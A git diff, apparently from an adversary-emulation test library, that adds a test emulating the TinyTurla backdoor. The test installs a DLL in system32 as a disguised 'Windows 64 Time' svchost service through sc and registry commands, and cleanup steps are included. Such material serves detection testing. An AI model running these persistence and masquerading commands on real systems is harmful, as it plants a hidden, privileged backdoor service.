+318,7 @@ - Atomic Test #1: Modify Fax service to run PowerShell [windows] - Atomic Test #2: Service Installation CMD [windows] - Atomic Test #3: Service Installation PowerShell [windows] + - Atomic Test #4: TinyTurla backdoor service w64time [windows] - [T1547.004 Winlogon Helper DLL](../../T1547.004/T1547.004.md) - Atomic Test #1: Winlogon Shell Key Persistence - PowerShell [windows] - Atomic Test #2: Winlogon Userinit Key Persistence - PowerShell [windows] @@ -811,6 +812,7 @@ - Atomic Test #1: Modify Fax service to run PowerShell [windows] - Atomic Test #2: Service Installation CMD [windows] - Atomic Test #3: Service Installation PowerShell [windows] + - Atomic Test #4: TinyTurla backdoor service w64time [windows] - [T1547.004 Winlogon Helper DLL](../../T1547.004/T1547.004.md) - Atomic Test #1: Winlogon Shell Key Persistence - PowerShell [windows] - Atomic Test #2: Winlogon Userinit Key Persistence - PowerShell [windows] diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index b54288eb..7d72b915 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -20485,6 +20485,36 @@ privilege-escalation: Stop-Service -Name "#{service_name}" 2>&1 | Out-Null try {(Get-WmiObject Win32_Service -filter "name='#{service_name}'").Delete()} catch {} + - name: TinyTurla backdoor service w64time + auto_generated_guid: ef0581fd-528e-4662-87bc-4c2affb86940 + description: | + It's running Dll as service to emulate the tine turla backdoor + + [Related Talos Blog](https://blog.talosintelligence.com/2021/09/tinyturla.html) + supported_platforms: + - windows + input_arguments: + dllfilename: + description: It specifies Dll file to run as service + type: string + default: "$PathToAtomicsFolder\\T1543.003\\bin\\w64time.dll" + executor: + command: |- + copy #{dllfilename} %systemroot%\system32\ + sc create W64Time binPath= "c:\Windows\System32\svchost.exe -k TimeService" type= share start=auto + sc config W64Time DisplayName= "Windows 64 Time" + sc description W64Time "Maintain date and time synch on all clients and services in the network" + reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Svchost" /v TimeService /t REG_MULTI_SZ /d "W64Time" /f + reg add "HKLM\SYSTEM\CurrentControlSet\Services\W64Time\Parameters" /v ServiceDll /t REG_EXPAND_SZ /d "%systemroot%\system32\w64time.dll" /f + sc start W64Time + cleanup_command: |- + sc stop W64Time + sc.exe delete W64Time + del %systemroot%\system32\w64time.dll + reg delete "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Svchost" /v TimeService /f + reg delete "HKLM\SYSTEM\CurrentControlSet\Services\W64Time\Parameters" /v ServiceDll /f + name: command_prompt + elevation_required: true T1547.004: technique: created: '2020-01-24T16:59:59.688Z' @@ -50420,6 +50450,36 @@ persistence: Stop-Service -Name "#{service_name}" 2>&1 | Out-Null try {(Get-WmiObject Win32_Service -filter "name='#{service_name}'").Delete()} catch {} + - name: TinyTurla backdoor service w64time + auto_generated_guid: ef0581fd-528e-4662-87bc-4c2affb86940 + description: | + It's running Dll as service to emulate the tine turla backdoor + + [Related Talos Blog](https://blog.talosintelligence.com/2021/09/tinyturla.html) + supported_platforms: + - windows + input_arguments: + dllfilename: + description: It specifies Dll file to run as service + type: string + default: "$PathToAtomicsFolder\\T1543.003\\bin\\w64time.dll" + executor: + command: |- + copy #{dllfilename} %systemroot%\system32\ + sc create W64Time binPath= "c:\Windows\System32\svchost.exe -k TimeService" type= share start=auto + sc config W64Time DisplayName= "Windows 64 Time" + sc description W64Time "Maintain date and time synch on all clients and services in the network" + reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Svchost" /v TimeService /t REG_MULTI_SZ /d "W64Time" /f + reg add "HKLM\SYSTEM\CurrentControlSet\Services\W64Time\Parameters" /v ServiceDll /t REG_EXPAND_SZ /d "%systemroot%\system32\w64time.dll" /f + sc start W64Time + cleanup_command: |- + sc stop W64Time + sc.exe delete W64Time + del %systemroot%\system32\w64time.dll + reg delete "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Svchost" /v TimeService /f + reg delete "HKLM\SYSTEM\CurrentControlSet\Services\W64Time\Parameters" /v ServiceDll /f + name: command_prompt + elevation_required: true T1547.004: technique: created: '2020-01-24T16:59:59.688Z' diff --git a/atomics/T1543.003/T1543.003.md b/atomics/T1543.003/T1543.003.md index 7044982f..b82342be 100644 --- a/atomics/T1543.003/T1543.003.md +++ b/atomics/T1543.003/T1543.003.md @@ -16,6 +16,8 @@ Services may be created with administrator privileges but are executed under SYS - [Atomic Test #3 - Service Installation PowerShell](#atomic-test-3---service-installation-powershell) +- [Atomic Test #4 - TinyTurla backdoor service w64time](#atomic-test-4---tinyturla-backdoor-service-w64time) +
@@ -160,4 +162,53 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato +
+
+ +## Atomic Test #4 - TinyTurla backdoor service w64time +It's running Dll as service to emulate the tine turla backdoor + +[Related Talos Blog](https://blog.talosintelligence.com/2021/09/tinyturla.html) + +**Supported Platforms:** Windows + + +**auto_generated_guid:** ef0581fd-528e-4662-87bc-4c2affb86940 + + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| dllfilename | It specifies Dll file to run as service | string | $PathToAtomicsFolder\T1543.003\bin\w64time.dll| + + +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) + + +```cmd +copy #{dllfilename} %systemroot%\system32\ +sc create W64Time binPath= "c:\Windows\System32\svchost.exe -k TimeService" type= share start=auto +sc config W64Time DisplayName= "Windows 64 Time" +sc description W64Time "Maintain date and time synch on all clients and services in the network" +reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Svchost" /v TimeService /t REG_MULTI_SZ /d "W64Time" /f +reg add "HKLM\SYSTEM\CurrentControlSet\Services\W64Time\Parameters" /v ServiceDll /t REG_EXPAND_SZ /d "%systemroot%\system32\w64time.dll" /f +sc start W64Time +``` + +#### Cleanup Commands: +```cmd +sc stop W64Time +sc.exe delete W64Time +del %systemroot%\system32\w64time.dll +reg delete "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Svchost" /v TimeService /f +reg delete "HKLM\SYSTEM\CurrentControlSet\Services\W64Time\Parameters" /v ServiceDll /f +``` + + + + +